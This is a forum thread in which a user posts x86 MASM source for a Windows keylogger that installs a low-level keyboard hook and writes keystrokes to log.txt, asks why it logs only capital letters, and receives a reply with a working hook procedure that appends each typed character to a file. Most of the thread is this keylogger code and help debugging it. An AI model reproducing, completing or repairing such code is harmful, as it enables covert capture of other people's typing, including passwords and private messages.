
ASM Keylogger need help, the strange thing is when I'm invoking WriteFile in the WndProc procedure my keylogger works fine, but it only gets CHAR from the window

polishgang


Hello Guys, I've got a problem with my keylogger. It only logs capital letters and does not log the ENTER key. The strange thing is when I'm invoking WriteFile in the WndProc procedure my keylogger works fine, but it only gets CHAR from my window....
This is the Keyboard Proc http://msdn.microsoft.com/en-us/library/ms644984%28VS.85%29.aspx

I don't know where the problem is


Sorry for my english and CODE.
Here is my code... I hope someone can help me
Thx alot
CODE
; Autor Polish-Gangsta|Dawid


.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include gdi32.inc
includelib user32.lib    
include kernel32.inc
includelib kernel32.lib
includelib gdi32.lib

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

.const
MEMSIZE equ 65535                ; not referenced anywhere in the visible listing

.DATA
ClassName db "Radonia4ever",0    ; window class name (RegisterClassEx / CreateWindowEx)
AppName db "PG greets Polska",0  ; window title passed to CreateWindowEx
dateiname db "log.txt",0         ; name of the log file opened by CreateFile in WinMain
tastaturEingaben db "Dawid",0    ; 6 bytes incl. NUL; only its sizeOf is used (TextOut in WndProc)
zeilenumbruch WORD 0A0Dh         ; stored little-endian as bytes 0Dh,0Ah = CR LF; written by KeyBoard

.DATA?
hInstance HINSTANCE ?            ; set at start from GetModuleHandle
CommandLine LPSTR ?              ; set at start from GetCommandLine


hFile HANDLE ?                   ; log file handle from CreateFile in WinMain; the only CloseHandle in the listing (after WndProc) is unreachable
hMemory HANDLE ?                 ; not used in the visible listing
pMemory DWORD ?                  ; not used in the visible listing
SizeReadWrite DWORD ?            ; receives the byte count from WriteFile

.CODE
start:                           ; program entry point (see 'end start')

invoke GetModuleHandle, NULL     ; eax = module handle of this executable
mov hInstance,eax
mov hInstance,eax                ; duplicate of the line above; redundant but harmless
invoke GetCommandLine
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess, eax          ; exit code = WinMain's return value (msg.wParam)

;-----------------------------------------------------------------------
; KeyBoard - hook procedure installed by WinMain with WH_KEYBOARD_LL.
; In:   nCode, wParam, lParam as passed by the system to the hook
; Out:  eax = return value of CallNextHookEx
; NOTE(review): ebx is read below (MessageBoxEx text/caption and the
;   WriteFile source buffer) but is never assigned in this procedure or
;   at the entry point, so its value here is undefined.
;-----------------------------------------------------------------------
KeyBoard proc nCode:DWORD, wParam:DWORD, lParam:DWORD

mov     eax, wParam              ; eax = wParam, treated as a message id below
       cmp     eax, WM_KEYUP          ; only need WM_KEYDOWN
       je      next_hook
cmp     eax, WM_SYSKEYUP      ; only Need WM_SYSKEYDOWN
       je      next_hook
      invoke MessageBoxEx,nCode,ebx,ebx,MB_OK,LANG_GERMAN   ; nCode used as hWnd, undefined ebx as text and caption; looks like leftover debugging (cf. the disabled copy below)
 invoke SetFilePointer,hFile,0,0,FILE_END   ; move to the end of the log file before writing
.IF wParam==13                   ; NOTE(review): wParam was compared with WM_KEYUP above, i.e. treated as a message id; a message id equal to 13 seems unlikely - verify this condition
 invoke WriteFile,hFile,ADDR zeilenumbruch,sizeOf zeilenumbruch,ADDR SizeReadWrite,0   ; write CR LF (2 bytes)
.ELSE
 invoke WriteFile,hFile,ebx,1,ADDR SizeReadWrite,0   ; write 1 byte from the address in ebx (undefined, see header)
.ENDIF


     ;invoke MessageBoxEx,nCode,edi,edi,MB_OK,LANG_GERMAN   ; disabled variant of the MessageBoxEx call above

next_hook:
invoke CallNextHookEx,KeyBoard,nCode,wParam,lParam   ; NOTE(review): first argument is the procedure address, not the HHOOK; WinMain does not store the handle SetWindowsHookEx returns
ret                              ; eax = CallNextHookEx result
KeyBoard endp

;-----------------------------------------------------------------------
; WinMain - opens the log file, installs the keyboard hook, registers
; the window class, creates the main window and runs the message loop.
; In:   hInst, hPrevInst, CmdLine, CmdShow (passed from start)
; Out:  eax = msg.wParam of the last message retrieved
;-----------------------------------------------------------------------
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND


; open (or create) the log file for writing; the handle is kept in the global hFile
invoke CreateFile,ADDR dateiname,\
GENERIC_WRITE ,\
FILE_SHARE_WRITE,\
NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,\
NULL
mov hFile,eax                    ; NOTE(review): the return value is not checked for failure
;invoke SetEndOfFile,hFile       ; disabled


; install the low-level keyboard hook. The HHOOK returned in eax is not saved,
; so neither CallNextHookEx (in KeyBoard) nor UnhookWindowsHookEx (in WndProc) receives it
invoke SetWindowsHookEx,WH_KEYBOARD_LL,addr KeyBoard,hInst,NULL ; register the hook


; fill in the window class
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance                   ; global set at start (same value as hInst)
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc  ; result not checked
invoke CreateWindowEx,NULL,\
ADDR ClassName,\
ADDR AppName,\
WS_OVERLAPPEDWINDOW,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
NULL,\
NULL,\
hInst,\
NULL
mov hwnd,eax                     ; result not checked
invoke ShowWindow, hwnd,CmdShow
invoke UpdateWindow, hwnd

; message loop; ends when GetMessage returns 0 (after PostQuitMessage in WndProc)
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam               ; return value = wParam of the last message


ret
WinMain endp


;-----------------------------------------------------------------------
; WndProc - window procedure of the main window.
; Out:  eax = 0 for the messages handled here, otherwise DefWindowProc's result
;-----------------------------------------------------------------------
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
LOCAL ps:PAINTSTRUCT
LOCAL hdc:HDC


.IF uMsg==WM_DESTROY
 invoke UnhookWindowsHookEx,KeyBoard   ; NOTE(review): expects the HHOOK from SetWindowsHookEx but gets the procedure address (the handle was never stored)
 invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_KEYUP
                                       ; WM_KEYUP: no-op, returns 0 without calling DefWindowProc
.ELSEIF uMsg==WM_PAINT
 invoke BeginPaint,hWnd, ADDR ps
 mov hdc,eax
 invoke TextOut,hdc,0,0,ADDR wParam,sizeOf tastaturEingaben   ; NOTE(review): draws sizeOf tastaturEingaben (6) bytes starting at the 4-byte (DWORD) wParam argument, i.e. 2 bytes past the parameter
 invoke EndPaint,hWnd, ADDR ps
.ELSE
 invoke DefWindowProc,hWnd,uMsg,wParam,lParam; default message handling
 ret                                   ; eax = DefWindowProc result
.ENDIF
xor eax,eax                            ; handled here: return 0
ret
WndProc endp

invoke CloseHandle,eax           ; NOTE(review): unreachable - no label precedes it and nothing jumps here (it follows WndProc's ret); presumably meant to close hFile, which is otherwise never closed
end start

ragdog


Hi

What sets your ebx?

here is a simple solution

CODE
;-----------------------------------------------------------------------
; KbdProc - hook procedure from the reply. hHook, fname, fh, fl and char
; are declared outside this snippet. Always returns 0; the result of
; CallNextHookEx is discarded.
;-----------------------------------------------------------------------
KbdProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
     invoke CallNextHookEx,hHook,nCode,wParam,lParam   ; hHook declared elsewhere (presumably the HHOOK from SetWindowsHookEx)
     mov eax,lParam
     mov ebx,[eax+4]            ; second DWORD of the structure lParam points to, compared with a message id below
     .if ebx==WM_CHAR

      invoke CreateFile,ADDR fname,FILE_APPEND_DATA, FILE_SHARE_WRITE or FILE_SHARE_READ,\
                   NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_ARCHIVE ,NULL
      mov fh,eax               ; opened for append on every matching message; closed again below

      mov ecx,lParam
      add ecx,8;; get pointer to ascii code of char
      mov ebx,[ecx]
      mov char,ebx             ; char is presumably a DWORD variable (declared outside the snippet)
      and char,0ffh;; keep only the low 8 bits
      .if char == 13;; ENTER -> LF in the log
       mov char,10
      .elseif char == 8;; backspace -> '~' in the log
       mov char,'~'
      .endif


      invoke WriteFile,fh,addr char,1,ADDR fl,NULL   ; write 1 byte; fl receives the byte count

      invoke CloseHandle,fh

     .endif

     xor eax,eax               ; always return 0
     ret
KbdProc endp
polishgang


THX RAGDOG for ur post and time!! :D nice community

i will study ur code
------------------------------------
I've tried ur code but it's still the same problem.... the letters are BIG and nothing changed. :( And I've got 2 questions

QUOTE
mov ebx,[eax+4]

how do u know that's the 2nd parameter?

QUOTE
add ecx,8;; get pointer to ascii code of char

and how do u know this?

thx for reply :tup
ragdog


Run it in a debugger, set a breakpoint, and you will see it.

This is not my code; I found it on my drive.
EnFeR RoI


I think you should use OllyDbg to understand how the code of the keylogger project you made works.

Hope it helps you!! )(
EnFeR RoI.